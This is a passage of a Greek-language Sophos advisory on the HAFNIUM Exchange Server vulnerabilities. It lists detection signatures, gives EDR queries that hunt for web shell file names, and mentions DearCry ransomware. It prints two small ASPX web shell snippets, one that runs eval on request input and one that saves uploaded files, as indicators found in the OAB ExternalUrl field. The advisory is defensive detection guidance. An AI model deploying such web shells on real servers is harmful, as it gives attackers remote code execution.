CVE-2021-26858 57245, 57246
CVE-2021-27065 57245, 57246

Sophos Intercept X Advanced και Sophos Antivirus (SAV)

Οι πελάτες της Sophos μπορούν να παρακολουθούν τις παρακάτω υπογραφές AV για να προσδιορίσουν τυχόν επιθέσεις από την ομάδα HAFNIUM:

Σχετικές με Web shell

  • Troj/WebShel-L
  • Troj/WebShel-M
  • Troj/WebShel-N
  • Troj/ASPDoor-T
  • Troj/ASPDoor-U
  • Troj/ASPDoor-V
  • Troj/AspScChk-A
  • Troj/Bckdr-RXD
  • Troj/WebShel-O (alert in progress)
  • Troj/WebShel-P (alert in progress)

Άλλα payloads

  • Mal/Chopper-A
  • ATK/Pivot-B
  • AMSI/PowerCat-A (Powercat)
  • AMSI/PSRev-A (Invoke-PowerShellTcpOneLine reverse shell)

Εξαιτίας τις δυναμικής φύσης των web shells, τα shells μπλοκάρονται αλλά είναι απαραίτητο να απομακρυνθούν χειροκίνητα. Αν δείτε τις παραπάνω ονομασίες ανίχνευσης στα δίκτυα σας θα πρέπει να προχωρήσετε άμεσα σε σχετική έρευνα και αποκατάσταση. Η Sophos έχει μπλοκάρει σχετικούς προορισμούς C2 IP, όπου βεβαίως ήταν ασφαλές να το κάνει. Επιπλέον, τα στάδια “lsass dump” της επίθεσης μπλοκάρονται από την προστασία διαπιστευτηρίων (CredGuard) που περιλαμβάνεται σε όλες τις συνδρομές Intercept X Advanced.

Sophos EDR

Οι πελάτες Sophos EDR μπορούν να αξιοποιήσουν τα προ-παρασκευασμένα queries για να προσδιορίσουν τυχόν web shells για περαιτέρω έρευνα:

/* Query for known web shell names */
SELECT
datetime(btime,'unixepoch') AS created_time,
filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE
(path LIKE 'C:inetpubwwwrootaspnet_client%' OR path LIKE 'C:inetpubwwwrootaspnet_clientsystem_web%' OR path LIKE 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth%')
AND filename IN ('web.aspx','help.aspx','document.aspx','errorEE.aspx','errorEEE.aspx','errorEW.aspx','errorFF.aspx','web.aspx','healthcheck.aspx','aspnet_www.aspx','aspnet_client.aspx','xx.aspx','shell.aspx','aspnet_iisstart.aspx','one.aspx','errorcheck.aspx','t.aspx','discover.aspx','aspnettest.aspx','error.aspx','RedirSuiteServerProxy.aspx','shellex.aspx','supp0rt.aspx','HttpProxy.aspx','system_web.aspx','OutlookEN.aspx','TimeoutLogout.aspx','Logout.aspx','OutlookJP.aspx','MultiUp.aspx','OutlookRU.aspx');
/* Query for web shells with randomized 8 character names */
SELECT
datetime(btime,'unixepoch') AS created_time,
regex_match(filename, '[0-9a-zA-Z]{8}.aspx', 0) AS filename,
directory,
size AS fileSize,
datetime(atime, 'unixepoch') AS access_time,
datetime(mtime, 'unixepoch') AS modified_time
FROM file
WHERE (path LIKE 'C:inetpubwwwrootaspnet_client%' OR path LIKE 'C:inetpubwwwrootaspnet_clientsystem_web%' OR path LIKE 'C:Program FilesMicrosoftExchange ServerV15FrontEndHttpProxyowaauth%');

Κατά την διερεύνηση των web shells που προσδιορίστηκαν ενδεχομένως από τα queries, ένα web shell θα εμφανίζεται τυπικά εντός του αρχείου διαμόρφωσης Exchange Offline Address Book (OAB), στο πεδίο ExternalUrl.

ExternalUrl : http://f/<script language=”JScript” runat=”server”>function Page_Load(){eval(Request[“key-here”],”unsafe”);}</script>

ExternalUrl: http://g/<script Language=”c#” runat=”server”>void Page_Load(object sender, EventArgs e){if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(“error.aspx”));}}</script>

Προσδιορίζοντας σημάδια παραβίασης

Η ομάδα Sophos MTR δημοσίευσε έναν αναλυτικό οδηγό βήμα-βήμα για το πως να αναζήτησε στο δίκτυο σας σημάδια παραβίασης.

Το ransomware DearCry

Αξίζει να αναφέρουμε ότι οι παράγοντες πίσω από το ransomware DearCry αξιοποιούν ακριβώς τις ίδιες ευπάθειες που εκμεταλλεύεται και η ομάδα “HAFNIUM” στις επιθέσεις της. Το Sophos Intercept X ωστόσο ανιχνεύει και μπλοκάρει το Dearcry μέσω των:

  • Troj/Ransom-GFE
  • CryptoGuard

Πηγή: Sophos